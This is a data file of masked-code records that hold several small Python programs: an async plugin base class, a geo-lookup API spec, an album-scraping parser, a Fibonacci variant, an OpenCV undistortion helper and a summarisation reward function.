{ "blob_id": "8b49aa63cc6e4490b7b22cd304dbba132962c870", "index": 9049, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass InventoryAsyncPlugin(SqPlugin):\n <mask token>\n\n async def run(self):\n \"\"\"Background task to launch in order to execute the plugin\"\"\"\n try:\n await self._execute()\n finally:\n await self._stop()\n\n @abstractmethod\n async def _execute(self):\n \"\"\"Launch the backuground task\n \"\"\"\n\n async def _stop(self):\n \"\"\"Actions to execute before terminating the task\n \"\"\"\n return\n", "step-3": "<mask token>\n\n\nclass InventoryAsyncPlugin(SqPlugin):\n \"\"\"Plugins which inherit this class will have methods 'run'\n\n Once the controller check that the object inherit this class, it launches\n a new task executing the run method.\n \"\"\"\n\n async def run(self):\n \"\"\"Background task to launch in order to execute the plugin\"\"\"\n try:\n await self._execute()\n finally:\n await self._stop()\n\n @abstractmethod\n async def _execute(self):\n \"\"\"Launch the backuground task\n \"\"\"\n\n async def _stop(self):\n \"\"\"Actions to execute before terminating the task\n \"\"\"\n return\n", "step-4": "from abc import abstractmethod\nfrom suzieq.shared.sq_plugin import SqPlugin\n\n\nclass InventoryAsyncPlugin(SqPlugin):\n \"\"\"Plugins which inherit this class will have methods 'run'\n\n Once the controller check that the object inherit this class, it launches\n a new task executing the run method.\n \"\"\"\n\n async def run(self):\n \"\"\"Background task to launch in order to execute the plugin\"\"\"\n try:\n await self._execute()\n finally:\n await self._stop()\n\n @abstractmethod\n async def _execute(self):\n \"\"\"Launch the backuground task\n \"\"\"\n\n async def _stop(self):\n \"\"\"Actions to execute before terminating the task\n \"\"\"\n return\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
""" This is a post login API and hence would have APIDetails and SessionDetails in the request object ------------------------------------------------------------------------------------------------- Step 1: find if user's ip address is provided in the request object, if yes then got to step 2 else goto step 4 Step 2: call third party api to find the country of the IP address and its ISO2 and ISO3 codes Step 3: using the ISO2 and/or ISO3 codes get the user's geo and associated currency. Return output Step 4: from UserProfiles table get city_id and using this get the user's geo and associated currency. Return output """ """ INPUT: { "APIDetails":{ "token_type":1, "token_vendor_id":1, "token_string":"sdxfcgvbhjnmklasdfghjk", "dev_key":"sjdkljagagerukjdgjncjdsnjkfhkjasdghreuiuie@#$%$dgd#$@d234" }, "SessionDetails":{ "profile_id":159, "session_id":787, "session_key":"xxbJt0nUwyMbsDdOfVFYISRjoD1DC0jO" }, "APIParams":{ "user_ip" : "192.168.0.1" } } """ """ OUTPUT: { "AuthenticationDetails": { "Status": "Success", "Message": "ApiDetails fine to process" }, "SessionDetails": { "Status": "Success", "Message": "session is active. session details updated", "Payload": { "profile_id": 159, "session_id": 787, "session_key": "LcTyf2Ypx6YRQOz3AYOyaE2uedblWnZB" } }, "Payload": { "Status": "Success", "Message": "ticket types and respective questions Fetched successfully", "Payload": { "geo_id": 2, "geo_name": "Indian Subcontinent", "geo_currency": "INR" } } } """
normal
{ "blob_id": "d7daf9b26f0b9f66b15b8533df032d17719e548b", "index": 3343, "step-1": "<mask token>\n", "step-2": "\"\"\"\nThis is a post login API and hence would have APIDetails and SessionDetails in the request object\n-------------------------------------------------------------------------------------------------\nStep 1: find if user's ip address is provided in the request object, if yes then got to step 2 else goto step 4\nStep 2: call third party api to find the country of the IP address and its ISO2 and ISO3 codes\nStep 3: using the ISO2 and/or ISO3 codes get the user's geo and associated currency. Return output\nStep 4: from UserProfiles table get city_id and using this get the user's geo and associated currency. Return output\n\"\"\"\n\n\"\"\"\nINPUT:\n{\n \"APIDetails\":{\n \t\"token_type\":1,\n \t\"token_vendor_id\":1,\n \t\"token_string\":\"sdxfcgvbhjnmklasdfghjk\",\n \t\"dev_key\":\"sjdkljagagerukjdgjncjdsnjkfhkjasdghreuiuie@#$%$dgd#$@d234\"\n },\n \"SessionDetails\":{\n \"profile_id\":159,\n \"session_id\":787,\n \"session_key\":\"xxbJt0nUwyMbsDdOfVFYISRjoD1DC0jO\"\n },\n \"APIParams\":{\n \"user_ip\" : \"192.168.0.1\"\n }\n}\n\"\"\"\n\n\"\"\"\nOUTPUT:\n{\n \"AuthenticationDetails\": {\n \"Status\": \"Success\",\n \"Message\": \"ApiDetails fine to process\"\n },\n \"SessionDetails\": {\n \"Status\": \"Success\",\n \"Message\": \"session is active. session details updated\",\n \"Payload\": {\n \"profile_id\": 159,\n \"session_id\": 787,\n \"session_key\": \"LcTyf2Ypx6YRQOz3AYOyaE2uedblWnZB\"\n }\n },\n \"Payload\": {\n \"Status\": \"Success\",\n \"Message\": \"ticket types and respective questions Fetched successfully\",\n \"Payload\": {\n \"geo_id\": 2,\n \"geo_name\": \"Indian Subcontinent\",\n \"geo_currency\": \"INR\"\n }\n }\n}\n\"\"\"", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
import sys from photo_dl.request import request from photo_dl.request import MultiRequest class Jav_ink: def __init__(self): self.parser_name = 'jav_ink' self.domain = 'https://www.jav.ink' self.album_flag = {} @staticmethod def category2albums(category_url): category_url = category_url[:category_url.find('/page/')] category_html = request(category_url) albums = category_html.xpath('//*[@id="infinite-articles"]/li[contains(@class, "post")]/a/@href') pages = category_html.xpath('//*[@class="pages"]/text()') if pages: pages = pages[0] pages = pages[pages.find('of') + 3:] urls = [] for page in range(1, int(pages) + 1): urls.append('%s/page/%d/' % (category_url, page)) urls = [{'url': url} for url in urls] threads = MultiRequest(urls=urls, progress=False).run() for thread in threads: albums.extend(thread.response.xpath('//*[@id="infinite-articles"]\ /li[contains(@class, "post")]/a/@href')) del thread return albums def album2photos(self, album_url, album_html): photos = [] album_id = album_html.xpath('//article/div/@id') if not album_id: return {'error': {'url': album_url, 'info': 'not supported'}} album_id = album_id[0] if album_id in self.album_flag: return self.album_flag[album_id] = 1 album_name = album_html.xpath('//*[contains(@class, "article-title")]/text()') photos_html = album_html.xpath('//*[@class="gallery-item"]') for photo_html in photos_html: photo_url = photo_html.xpath('.//a/@href')[0] photo_name = photo_url[photo_url.rfind('/') + 1:] photos.append({'photo_url': photo_url, 'photo_name': photo_name}) if len(album_name) == 0: album_name = album_url.split('/')[-2] else: album_name = album_name[0] album = {'parser_name': self.parser_name, 'album_name': album_name, 'photos': photos} return album def url2albums(self, url): albums_url = [] if '/category/' in url or '/?s=' in url: albums_url.extend(self.category2albums(url)) else: albums_url.append(url) albums = [] urls = [{'url': url} for url in albums_url] threads = MultiRequest(urls=urls, name=url).run() for thread in threads: try: album = self.album2photos(thread.url, thread.response) if album is not None: albums.append(album) except SystemExit: sys.exit() except: albums.append({'error': {'url': thread.url, 'info': 'parse error'}}) del thread return albums
normal
{ "blob_id": "9fff345dedcfc7051a258bc471acf07aece95bcf", "index": 9319, "step-1": "<mask token>\n\n\nclass Jav_ink:\n\n def __init__(self):\n self.parser_name = 'jav_ink'\n self.domain = 'https://www.jav.ink'\n self.album_flag = {}\n <mask token>\n\n def album2photos(self, album_url, album_html):\n photos = []\n album_id = album_html.xpath('//article/div/@id')\n if not album_id:\n return {'error': {'url': album_url, 'info': 'not supported'}}\n album_id = album_id[0]\n if album_id in self.album_flag:\n return\n self.album_flag[album_id] = 1\n album_name = album_html.xpath(\n '//*[contains(@class, \"article-title\")]/text()')\n photos_html = album_html.xpath('//*[@class=\"gallery-item\"]')\n for photo_html in photos_html:\n photo_url = photo_html.xpath('.//a/@href')[0]\n photo_name = photo_url[photo_url.rfind('/') + 1:]\n photos.append({'photo_url': photo_url, 'photo_name': photo_name})\n if len(album_name) == 0:\n album_name = album_url.split('/')[-2]\n else:\n album_name = album_name[0]\n album = {'parser_name': self.parser_name, 'album_name': album_name,\n 'photos': photos}\n return album\n <mask token>\n", "step-2": "<mask token>\n\n\nclass Jav_ink:\n\n def __init__(self):\n self.parser_name = 'jav_ink'\n self.domain = 'https://www.jav.ink'\n self.album_flag = {}\n <mask token>\n\n def album2photos(self, album_url, album_html):\n photos = []\n album_id = album_html.xpath('//article/div/@id')\n if not album_id:\n return {'error': {'url': album_url, 'info': 'not supported'}}\n album_id = album_id[0]\n if album_id in self.album_flag:\n return\n self.album_flag[album_id] = 1\n album_name = album_html.xpath(\n '//*[contains(@class, \"article-title\")]/text()')\n photos_html = album_html.xpath('//*[@class=\"gallery-item\"]')\n for photo_html in photos_html:\n photo_url = photo_html.xpath('.//a/@href')[0]\n photo_name = photo_url[photo_url.rfind('/') + 1:]\n photos.append({'photo_url': photo_url, 'photo_name': photo_name})\n if len(album_name) == 0:\n album_name = album_url.split('/')[-2]\n else:\n album_name = album_name[0]\n album = {'parser_name': self.parser_name, 'album_name': album_name,\n 'photos': photos}\n return album\n\n def url2albums(self, url):\n albums_url = []\n if '/category/' in url or '/?s=' in url:\n albums_url.extend(self.category2albums(url))\n else:\n albums_url.append(url)\n albums = []\n urls = [{'url': url} for url in albums_url]\n threads = MultiRequest(urls=urls, name=url).run()\n for thread in threads:\n try:\n album = self.album2photos(thread.url, thread.response)\n if album is not None:\n albums.append(album)\n except SystemExit:\n sys.exit()\n except:\n albums.append({'error': {'url': thread.url, 'info':\n 'parse error'}})\n del thread\n return albums\n", "step-3": "<mask token>\n\n\nclass Jav_ink:\n\n def __init__(self):\n self.parser_name = 'jav_ink'\n self.domain = 'https://www.jav.ink'\n self.album_flag = {}\n\n @staticmethod\n def category2albums(category_url):\n category_url = category_url[:category_url.find('/page/')]\n category_html = request(category_url)\n albums = category_html.xpath(\n '//*[@id=\"infinite-articles\"]/li[contains(@class, \"post\")]/a/@href'\n )\n pages = category_html.xpath('//*[@class=\"pages\"]/text()')\n if pages:\n pages = pages[0]\n pages = pages[pages.find('of') + 3:]\n urls = []\n for page in range(1, int(pages) + 1):\n urls.append('%s/page/%d/' % (category_url, page))\n urls = [{'url': url} for url in urls]\n threads = MultiRequest(urls=urls, progress=False).run()\n for thread in threads:\n albums.extend(thread.response.xpath(\n '//*[@id=\"infinite-articles\"] /li[contains(@class, \"post\")]/a/@href'\n ))\n del thread\n return albums\n\n def album2photos(self, album_url, album_html):\n photos = []\n album_id = album_html.xpath('//article/div/@id')\n if not album_id:\n return {'error': {'url': album_url, 'info': 'not supported'}}\n album_id = album_id[0]\n if album_id in self.album_flag:\n return\n self.album_flag[album_id] = 1\n album_name = album_html.xpath(\n '//*[contains(@class, \"article-title\")]/text()')\n photos_html = album_html.xpath('//*[@class=\"gallery-item\"]')\n for photo_html in photos_html:\n photo_url = photo_html.xpath('.//a/@href')[0]\n photo_name = photo_url[photo_url.rfind('/') + 1:]\n photos.append({'photo_url': photo_url, 'photo_name': photo_name})\n if len(album_name) == 0:\n album_name = album_url.split('/')[-2]\n else:\n album_name = album_name[0]\n album = {'parser_name': self.parser_name, 'album_name': album_name,\n 'photos': photos}\n return album\n\n def url2albums(self, url):\n albums_url = []\n if '/category/' in url or '/?s=' in url:\n albums_url.extend(self.category2albums(url))\n else:\n albums_url.append(url)\n albums = []\n urls = [{'url': url} for url in albums_url]\n threads = MultiRequest(urls=urls, name=url).run()\n for thread in threads:\n try:\n album = self.album2photos(thread.url, thread.response)\n if album is not None:\n albums.append(album)\n except SystemExit:\n sys.exit()\n except:\n albums.append({'error': {'url': thread.url, 'info':\n 'parse error'}})\n del thread\n return albums\n", "step-4": "import sys\nfrom photo_dl.request import request\nfrom photo_dl.request import MultiRequest\n\n\nclass Jav_ink:\n\n def __init__(self):\n self.parser_name = 'jav_ink'\n self.domain = 'https://www.jav.ink'\n self.album_flag = {}\n\n @staticmethod\n def category2albums(category_url):\n category_url = category_url[:category_url.find('/page/')]\n category_html = request(category_url)\n albums = category_html.xpath(\n '//*[@id=\"infinite-articles\"]/li[contains(@class, \"post\")]/a/@href'\n )\n pages = category_html.xpath('//*[@class=\"pages\"]/text()')\n if pages:\n pages = pages[0]\n pages = pages[pages.find('of') + 3:]\n urls = []\n for page in range(1, int(pages) + 1):\n urls.append('%s/page/%d/' % (category_url, page))\n urls = [{'url': url} for url in urls]\n threads = MultiRequest(urls=urls, progress=False).run()\n for thread in threads:\n albums.extend(thread.response.xpath(\n '//*[@id=\"infinite-articles\"] /li[contains(@class, \"post\")]/a/@href'\n ))\n del thread\n return albums\n\n def album2photos(self, album_url, album_html):\n photos = []\n album_id = album_html.xpath('//article/div/@id')\n if not album_id:\n return {'error': {'url': album_url, 'info': 'not supported'}}\n album_id = album_id[0]\n if album_id in self.album_flag:\n return\n self.album_flag[album_id] = 1\n album_name = album_html.xpath(\n '//*[contains(@class, \"article-title\")]/text()')\n photos_html = album_html.xpath('//*[@class=\"gallery-item\"]')\n for photo_html in photos_html:\n photo_url = photo_html.xpath('.//a/@href')[0]\n photo_name = photo_url[photo_url.rfind('/') + 1:]\n photos.append({'photo_url': photo_url, 'photo_name': photo_name})\n if len(album_name) == 0:\n album_name = album_url.split('/')[-2]\n else:\n album_name = album_name[0]\n album = {'parser_name': self.parser_name, 'album_name': album_name,\n 'photos': photos}\n return album\n\n def url2albums(self, url):\n albums_url = []\n if '/category/' in url or '/?s=' in url:\n albums_url.extend(self.category2albums(url))\n else:\n albums_url.append(url)\n albums = []\n urls = [{'url': url} for url in albums_url]\n threads = MultiRequest(urls=urls, name=url).run()\n for thread in threads:\n try:\n album = self.album2photos(thread.url, thread.response)\n if album is not None:\n albums.append(album)\n except SystemExit:\n sys.exit()\n except:\n albums.append({'error': {'url': thread.url, 'info':\n 'parse error'}})\n del thread\n return albums\n", "step-5": "import sys\nfrom photo_dl.request import request\nfrom photo_dl.request import MultiRequest\n\n\nclass Jav_ink:\n def __init__(self):\n self.parser_name = 'jav_ink'\n self.domain = 'https://www.jav.ink'\n self.album_flag = {}\n\n @staticmethod\n def category2albums(category_url):\n category_url = category_url[:category_url.find('/page/')]\n category_html = request(category_url)\n albums = category_html.xpath('//*[@id=\"infinite-articles\"]/li[contains(@class, \"post\")]/a/@href')\n pages = category_html.xpath('//*[@class=\"pages\"]/text()')\n if pages:\n pages = pages[0]\n pages = pages[pages.find('of') + 3:]\n urls = []\n for page in range(1, int(pages) + 1):\n urls.append('%s/page/%d/' % (category_url, page))\n urls = [{'url': url} for url in urls]\n threads = MultiRequest(urls=urls, progress=False).run()\n for thread in threads:\n albums.extend(thread.response.xpath('//*[@id=\"infinite-articles\"]\\\n /li[contains(@class, \"post\")]/a/@href'))\n del thread\n return albums\n\n def album2photos(self, album_url, album_html):\n photos = []\n album_id = album_html.xpath('//article/div/@id')\n if not album_id:\n return {'error': {'url': album_url, 'info': 'not supported'}}\n album_id = album_id[0]\n if album_id in self.album_flag:\n return\n self.album_flag[album_id] = 1\n\n album_name = album_html.xpath('//*[contains(@class, \"article-title\")]/text()')\n photos_html = album_html.xpath('//*[@class=\"gallery-item\"]')\n for photo_html in photos_html:\n photo_url = photo_html.xpath('.//a/@href')[0]\n photo_name = photo_url[photo_url.rfind('/') + 1:]\n photos.append({'photo_url': photo_url, 'photo_name': photo_name})\n if len(album_name) == 0:\n album_name = album_url.split('/')[-2]\n else:\n album_name = album_name[0]\n album = {'parser_name': self.parser_name, 'album_name': album_name, 'photos': photos}\n return album\n\n def url2albums(self, url):\n albums_url = []\n if '/category/' in url or '/?s=' in url:\n albums_url.extend(self.category2albums(url))\n else:\n albums_url.append(url)\n\n albums = []\n urls = [{'url': url} for url in albums_url]\n threads = MultiRequest(urls=urls, name=url).run()\n for thread in threads:\n try:\n album = self.album2photos(thread.url, thread.response)\n if album is not None:\n albums.append(album)\n except SystemExit:\n sys.exit()\n except:\n albums.append({'error': {'url': thread.url, 'info': 'parse error'}})\n del thread\n return albums\n", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
w = int(input("Width ?")) h= int(input("Height ?")) for b in range(1,w+1): print ("*", end='') print("") for i in range(1,h-1): print ("*", end='') for j in range(1,w-1): print (" ", end='') print ("*", end='') print("") for b in range(1,w+1): print ("*", end='') print("")
normal
{ "blob_id": "32b961f3971819fdbbe1a30fd7cf1883353c1854", "index": 2294, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor b in range(1, w + 1):\n print('*', end='')\nprint('')\nfor i in range(1, h - 1):\n print('*', end='')\n for j in range(1, w - 1):\n print(' ', end='')\n print('*', end='')\n print('')\nfor b in range(1, w + 1):\n print('*', end='')\nprint('')\n", "step-3": "w = int(input('Width ?'))\nh = int(input('Height ?'))\nfor b in range(1, w + 1):\n print('*', end='')\nprint('')\nfor i in range(1, h - 1):\n print('*', end='')\n for j in range(1, w - 1):\n print(' ', end='')\n print('*', end='')\n print('')\nfor b in range(1, w + 1):\n print('*', end='')\nprint('')\n", "step-4": "w = int(input(\"Width ?\"))\nh= int(input(\"Height ?\"))\n\n\nfor b in range(1,w+1):\n\tprint (\"*\", end='')\nprint(\"\")\n\n\nfor i in range(1,h-1):\n\tprint (\"*\", end='')\n\tfor j in range(1,w-1):\n\t\tprint (\" \", end='')\n\tprint (\"*\", end='')\n\tprint(\"\")\n\nfor b in range(1,w+1):\n\tprint (\"*\", end='')\nprint(\"\")", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
#!/bin/python3 import sys def fibonacciModified(t1, t2, n): ti = t1 ti_1 = t2 for i in range (2, n): ti_2 = ti + ti_1**2 ti = ti_1 ti_1 = ti_2 return ti_2 if __name__ == "__main__": t1, t2, n = input().strip().split(' ') t1, t2, n = [int(t1), int(t2), int(n)] result = fibonacciModified(t1, t2, n) print(result)
normal
{ "blob_id": "3838df627318b25767738da912f44e494cef40f3", "index": 6833, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef fibonacciModified(t1, t2, n):\n ti = t1\n ti_1 = t2\n for i in range(2, n):\n ti_2 = ti + ti_1 ** 2\n ti = ti_1\n ti_1 = ti_2\n return ti_2\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef fibonacciModified(t1, t2, n):\n ti = t1\n ti_1 = t2\n for i in range(2, n):\n ti_2 = ti + ti_1 ** 2\n ti = ti_1\n ti_1 = ti_2\n return ti_2\n\n\nif __name__ == '__main__':\n t1, t2, n = input().strip().split(' ')\n t1, t2, n = [int(t1), int(t2), int(n)]\n result = fibonacciModified(t1, t2, n)\n print(result)\n", "step-4": "import sys\n\n\ndef fibonacciModified(t1, t2, n):\n ti = t1\n ti_1 = t2\n for i in range(2, n):\n ti_2 = ti + ti_1 ** 2\n ti = ti_1\n ti_1 = ti_2\n return ti_2\n\n\nif __name__ == '__main__':\n t1, t2, n = input().strip().split(' ')\n t1, t2, n = [int(t1), int(t2), int(n)]\n result = fibonacciModified(t1, t2, n)\n print(result)\n", "step-5": "#!/bin/python3\n\nimport sys\n\ndef fibonacciModified(t1, t2, n):\n ti = t1\n ti_1 = t2\n for i in range (2, n):\n ti_2 = ti + ti_1**2\n ti = ti_1\n ti_1 = ti_2\n return ti_2\n\nif __name__ == \"__main__\":\n t1, t2, n = input().strip().split(' ')\n t1, t2, n = [int(t1), int(t2), int(n)]\n result = fibonacciModified(t1, t2, n)\n print(result)\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import numpy as np import cv2 from camera import load_K, load_camera_dist, load_camera_ret def undistort_img(img): ''' Return an undistorted image given previous calibrated parameters References from OpenCV docs ''' ret = load_camera_ret() K = load_K() dist = load_camera_dist() h,w = img.shape[:2] new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K,dist,(w,h),1,(w,h)) img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix) return img_undistorted
normal
{ "blob_id": "844c630d3fe2dda833064556228b524608cfece9", "index": 4671, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef undistort_img(img):\n \"\"\"\n Return an undistorted image given previous calibrated parameters \n References from OpenCV docs\n \"\"\"\n ret = load_camera_ret()\n K = load_K()\n dist = load_camera_dist()\n h, w = img.shape[:2]\n new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K, dist, (w, h),\n 1, (w, h))\n img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)\n return img_undistorted\n", "step-3": "import numpy as np\nimport cv2\nfrom camera import load_K, load_camera_dist, load_camera_ret\n\n\ndef undistort_img(img):\n \"\"\"\n Return an undistorted image given previous calibrated parameters \n References from OpenCV docs\n \"\"\"\n ret = load_camera_ret()\n K = load_K()\n dist = load_camera_dist()\n h, w = img.shape[:2]\n new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K, dist, (w, h),\n 1, (w, h))\n img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)\n return img_undistorted\n", "step-4": "import numpy as np\nimport cv2\n\nfrom camera import load_K, load_camera_dist, load_camera_ret\n\ndef undistort_img(img):\n '''\n Return an undistorted image given previous calibrated parameters \n References from OpenCV docs\n '''\n ret = load_camera_ret()\n K = load_K()\n dist = load_camera_dist()\n h,w = img.shape[:2]\n\n new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K,dist,(w,h),1,(w,h))\n img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)\n\n return img_undistorted\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
from scipy.stats import rv_discrete import torch import torch.nn.functional as F import numpy as np from utils import * def greedy_max(doc_length,px,sentence_embed,sentences,device,sentence_lengths,length_limit=200,lamb=0.2): ''' prob: sum should be 1 sentence embed: [doc_length, embed_dim] ''' x = list(range(doc_length)) px = px.cpu().numpy() score=px prob = 1 summary_representation = [] bias = np.ones(px.shape) selected = [] wc=0 lengths=[] summary = [] while wc<=length_limit: sample = np.argmax(score) selected.append(sample) wc+=sentence_lengths[sample] lengths.append(sentence_lengths[sample]) summary.append(sentences[sample]) summary_representation.append(sentence_embed[sample]) s = torch.stack(summary_representation,1).unsqueeze(0) all_sent = sentence_embed[:doc_length,:].unsqueeze(2) redundancy_score =torch.max(F.cosine_similarity(all_sent,s,1),1)[0].cpu().numpy() score = lamb*px - ((1-lamb)*redundancy_score) + (1-lamb)*bias for i_sel in selected: score[i_sel] = 0 # print(len(selected)) summary ='\n'.join(summary) # summary_representation= summary_representation.to(device) return summary, prob, selected def greedy_nommr(doc_length,px,sentence_embed,sentences,device,sentence_lengths,length_limit=200,lamb=0.2): ''' prob: sum should be 1 sentence embed: [doc_length, embed_dim] ''' x = list(range(doc_length)) px = px.cpu().numpy() score=px prob = 1 bias = np.ones(px.shape) summary_representation = [] selected = [] wc=0 lengths = [] summary=[] while wc<=length_limit: sample = np.argmax(score) selected.append(sample) wc+=sentence_lengths[sample] lengths.append(sentence_lengths[sample]) summary.append(sentences[sample]) for i_sel in selected: score[i_sel] = 0 summary = '\n'.join(summary) return summary, prob, selected def compute_reward(score_batch,input_lengths,output,sentences_batch,reference_batch,device,sentence_lengths_batch,number_of_sample=5,lamb=0.1): reward_batch = [] rl_label_batch = torch.zeros(output.size()[:2]).unsqueeze(2) for i_data in range(len(input_lengths)): # summary_i = summary_embed[i_data] doc_length = input_lengths[i_data] scores = score_batch[i_data,:doc_length] sentence_lengths = sentence_lengths_batch[i_data] sentence_embed = output[:doc_length,i_data,:] sentences = sentences_batch[i_data] reference = reference_batch[i_data] # final_choice = None result,prob,selected = greedy_nommr(doc_length,scores,sentence_embed,sentences,device,sentence_lengths,lamb = lamb) reward_greedy = get_rouge_single(result,reference) result,prob,selected = greedy_max(doc_length,scores,sentence_embed,sentences,device,sentence_lengths,lamb = lamb) reward_hi = get_rouge_single(result,reference) final_choice = selected # print(reward_hi-reward_greedy) reward_batch.append(reward_hi-reward_greedy) rl_label_batch[final_choice,i_data,:] = 1 reward_batch = torch.FloatTensor(reward_batch).unsqueeze(0).to(device) rl_label_batch = rl_label_batch.to(device) reward_batch.requires_grad_(False) return reward_batch,rl_label_batch
normal
{ "blob_id": "cc6e827eec5256ce0dbe13958b6178c59bcd94a7", "index": 8802, "step-1": "<mask token>\n\n\ndef compute_reward(score_batch, input_lengths, output, sentences_batch,\n reference_batch, device, sentence_lengths_batch, number_of_sample=5,\n lamb=0.1):\n reward_batch = []\n rl_label_batch = torch.zeros(output.size()[:2]).unsqueeze(2)\n for i_data in range(len(input_lengths)):\n doc_length = input_lengths[i_data]\n scores = score_batch[i_data, :doc_length]\n sentence_lengths = sentence_lengths_batch[i_data]\n sentence_embed = output[:doc_length, i_data, :]\n sentences = sentences_batch[i_data]\n reference = reference_batch[i_data]\n result, prob, selected = greedy_nommr(doc_length, scores,\n sentence_embed, sentences, device, sentence_lengths, lamb=lamb)\n reward_greedy = get_rouge_single(result, reference)\n result, prob, selected = greedy_max(doc_length, scores,\n sentence_embed, sentences, device, sentence_lengths, lamb=lamb)\n reward_hi = get_rouge_single(result, reference)\n final_choice = selected\n reward_batch.append(reward_hi - reward_greedy)\n rl_label_batch[final_choice, i_data, :] = 1\n reward_batch = torch.FloatTensor(reward_batch).unsqueeze(0).to(device)\n rl_label_batch = rl_label_batch.to(device)\n reward_batch.requires_grad_(False)\n return reward_batch, rl_label_batch\n", "step-2": "<mask token>\n\n\ndef greedy_max(doc_length, px, sentence_embed, sentences, device,\n sentence_lengths, length_limit=200, lamb=0.2):\n \"\"\"\n\tprob: sum should be 1\n\tsentence embed: [doc_length, embed_dim]\n\t\"\"\"\n x = list(range(doc_length))\n px = px.cpu().numpy()\n score = px\n prob = 1\n summary_representation = []\n bias = np.ones(px.shape)\n selected = []\n wc = 0\n lengths = []\n summary = []\n while wc <= length_limit:\n sample = np.argmax(score)\n selected.append(sample)\n wc += sentence_lengths[sample]\n lengths.append(sentence_lengths[sample])\n summary.append(sentences[sample])\n summary_representation.append(sentence_embed[sample])\n s = torch.stack(summary_representation, 1).unsqueeze(0)\n all_sent = sentence_embed[:doc_length, :].unsqueeze(2)\n redundancy_score = torch.max(F.cosine_similarity(all_sent, s, 1), 1)[0\n ].cpu().numpy()\n score = lamb * px - (1 - lamb) * redundancy_score + (1 - lamb) * bias\n for i_sel in selected:\n score[i_sel] = 0\n summary = '\\n'.join(summary)\n return summary, prob, selected\n\n\n<mask token>\n\n\ndef compute_reward(score_batch, input_lengths, output, sentences_batch,\n reference_batch, device, sentence_lengths_batch, number_of_sample=5,\n lamb=0.1):\n reward_batch = []\n rl_label_batch = torch.zeros(output.size()[:2]).unsqueeze(2)\n for i_data in range(len(input_lengths)):\n doc_length = input_lengths[i_data]\n scores = score_batch[i_data, :doc_length]\n sentence_lengths = sentence_lengths_batch[i_data]\n sentence_embed = output[:doc_length, i_data, :]\n sentences = sentences_batch[i_data]\n reference = reference_batch[i_data]\n result, prob, selected = greedy_nommr(doc_length, scores,\n sentence_embed, sentences, device, sentence_lengths, lamb=lamb)\n reward_greedy = get_rouge_single(result, reference)\n result, prob, selected = greedy_max(doc_length, scores,\n sentence_embed, sentences, device, sentence_lengths, lamb=lamb)\n reward_hi = get_rouge_single(result, reference)\n final_choice = selected\n reward_batch.append(reward_hi - reward_greedy)\n rl_label_batch[final_choice, i_data, :] = 1\n reward_batch = torch.FloatTensor(reward_batch).unsqueeze(0).to(device)\n rl_label_batch = rl_label_batch.to(device)\n reward_batch.requires_grad_(False)\n return reward_batch, rl_label_batch\n", "step-3": "<mask token>\n\n\ndef greedy_max(doc_length, px, sentence_embed, sentences, device,\n sentence_lengths, length_limit=200, lamb=0.2):\n \"\"\"\n\tprob: sum should be 1\n\tsentence embed: [doc_length, embed_dim]\n\t\"\"\"\n x = list(range(doc_length))\n px = px.cpu().numpy()\n score = px\n prob = 1\n summary_representation = []\n bias = np.ones(px.shape)\n selected = []\n wc = 0\n lengths = []\n summary = []\n while wc <= length_limit:\n sample = np.argmax(score)\n selected.append(sample)\n wc += sentence_lengths[sample]\n lengths.append(sentence_lengths[sample])\n summary.append(sentences[sample])\n summary_representation.append(sentence_embed[sample])\n s = torch.stack(summary_representation, 1).unsqueeze(0)\n all_sent = sentence_embed[:doc_length, :].unsqueeze(2)\n redundancy_score = torch.max(F.cosine_similarity(all_sent, s, 1), 1)[0\n ].cpu().numpy()\n score = lamb * px - (1 - lamb) * redundancy_score + (1 - lamb) * bias\n for i_sel in selected:\n score[i_sel] = 0\n summary = '\\n'.join(summary)\n return summary, prob, selected\n\n\ndef greedy_nommr(doc_length, px, sentence_embed, sentences, device,\n sentence_lengths, length_limit=200, lamb=0.2):\n \"\"\"\n\tprob: sum should be 1\n\tsentence embed: [doc_length, embed_dim]\n\t\"\"\"\n x = list(range(doc_length))\n px = px.cpu().numpy()\n score = px\n prob = 1\n bias = np.ones(px.shape)\n summary_representation = []\n selected = []\n wc = 0\n lengths = []\n summary = []\n while wc <= length_limit:\n sample = np.argmax(score)\n selected.append(sample)\n wc += sentence_lengths[sample]\n lengths.append(sentence_lengths[sample])\n summary.append(sentences[sample])\n for i_sel in selected:\n score[i_sel] = 0\n summary = '\\n'.join(summary)\n return summary, prob, selected\n\n\ndef compute_reward(score_batch, input_lengths, output, sentences_batch,\n reference_batch, device, sentence_lengths_batch, number_of_sample=5,\n lamb=0.1):\n reward_batch = []\n rl_label_batch = torch.zeros(output.size()[:2]).unsqueeze(2)\n for i_data in range(len(input_lengths)):\n doc_length = input_lengths[i_data]\n scores = score_batch[i_data, :doc_length]\n sentence_lengths = sentence_lengths_batch[i_data]\n sentence_embed = output[:doc_length, i_data, :]\n sentences = sentences_batch[i_data]\n reference = reference_batch[i_data]\n result, prob, selected = greedy_nommr(doc_length, scores,\n sentence_embed, sentences, device, sentence_lengths, lamb=lamb)\n reward_greedy = get_rouge_single(result, reference)\n result, prob, selected = greedy_max(doc_length, scores,\n sentence_embed, sentences, device, sentence_lengths, lamb=lamb)\n reward_hi = get_rouge_single(result, reference)\n final_choice = selected\n reward_batch.append(reward_hi - reward_greedy)\n rl_label_batch[final_choice, i_data, :] = 